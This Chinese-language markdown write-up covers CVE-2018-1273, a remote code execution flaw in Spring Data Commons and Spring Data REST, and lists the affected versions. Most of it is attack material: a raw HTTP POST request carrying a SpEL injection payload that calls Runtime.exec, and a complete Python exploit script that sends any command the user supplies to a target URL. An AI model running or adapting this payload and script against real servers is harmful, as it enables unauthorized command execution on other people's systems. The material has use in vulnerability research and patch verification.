（CVE-2018-1273）Spring Data Commons组件远程代码执行漏洞.md

3.94 KB / 2021-07-15 20:04:26
    （CVE-2018-1273）Spring Data Commons组件远程代码执行漏洞
========================================================

一、漏洞简介
------------

攻击者可以构造恶意的请求对Spring Data
REST发起攻击，包括使用基于HTTP资源的，或者其他请求基于Spring Data's
projection负载结合的，最终导致远程代码执行攻击。

二、漏洞影响
------------

Spring Data Commons 1.13 - 1.13.10(Ingalls SR10)

Spring Data REST 2.6 - 2.6.10 (Ingalls SR10)

Spring Data Commons 2.0 - 2.0.5 (Kay SR5)

Spring Data REST 3.0 - 3.0.5 (Kay SR5)

三、复现过程
------------

    POST /users?page=&size=5 HTTP/1.1
    Host: localhost:8080
    Connection: keep-alive
    Content-Length: 124
    Pragma: no-cache
    Cache-Control: no-cache
    Origin: http://localhost:8080
    Upgrade-Insecure-Requests: 1
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
    Referer: http://localhost:8080/users?page=0&size=5
    Accept-Encoding: gzip, deflate, br
    Accept-Language: zh-CN,zh;q=0.9,en;q=0.8

    username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("touch /tmp/success")]=&password=&repeatedPassword=

执行`docker-compose exec spring bash`进入容器中，可见成功创建`/tmp/success`，说明命令执行成功：

![1.png](./resource/(CVE-2018-1273)SpringDataCommons组件远程代码执行漏洞/media/rId24.png)

### poc

    cve-2018-1273_cmd.py
    #!/usr/bin/python3
    #-*- coding:utf-8 -*-
    # author:zhzyker
    # from:https://github.com/zhzyker/exphub
    # telegram:t.me/zhzyker

    import requests
    import sys

    if len(sys.argv)!=3:
        print('+----------------------------------------------------------------------------+')
        print('+ DES: by zhzyker as https://github.com/zhzyker/exphub                       +')
        print('+      Spring Data Commons Remote Code Execution (No display)                +')
        print('+----------------------------------------------------------------------------+')
        print('+ USE: python3 cve-2018-1273_cmd.py <url> "<cmd>"                            +')
        print('+ EXP: python3 cve-2018-1273_cmd.py http://1.1.1.1:8080 "touch /tmp/exphub"  +')
        print('+ VER: Spring Data Commons 1.13 to 1.13.10                                   +')
        print('+      Spring Data Commons 2.0 to 2.0.5                                      +')
        print('+----------------------------------------------------------------------------+')
        sys.exit()
        
    url = sys.argv[1]
    cmd = sys.argv[2]
    vuln = url + "/users"  

    headers = {
        'Host': "localhost:8080",
        'Connection': "keep-alive",
        'Content-Length': "120",
        'Pragma': "no-cache",
        'Cache-Control': "no-cache",
        'Origin': "http://localhost:8080",
        'Upgrade-Insecure-Requests': "1",
        'Content-Type': "application/x-www-form-urlencoded",
        'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 Safari/537.36",
        'Accept': "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8",
        'Referer': "http://localhost:8080/users?page=0&size=5",
        'Accept-Encoding': "gzip, deflate, br",
        'Accept-Language': "zh-CN,zh;q=0.9,en;q=0.8"
        }
        
    payload = "username[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('%s')]=&password=&repeatedPassword=" % cmd

    try:
        r = requests.post(vuln, data=payload, headers=headers)
        if r.status_code == 500:
            print ("[+] Code executed successfully")
        else:
            print ("[-] Target Not CVE-2018-1273 Vuln, Good Luck")
    except:
        print ("[-] Target Not CVE-2018-1273 Vuln, Good Luck")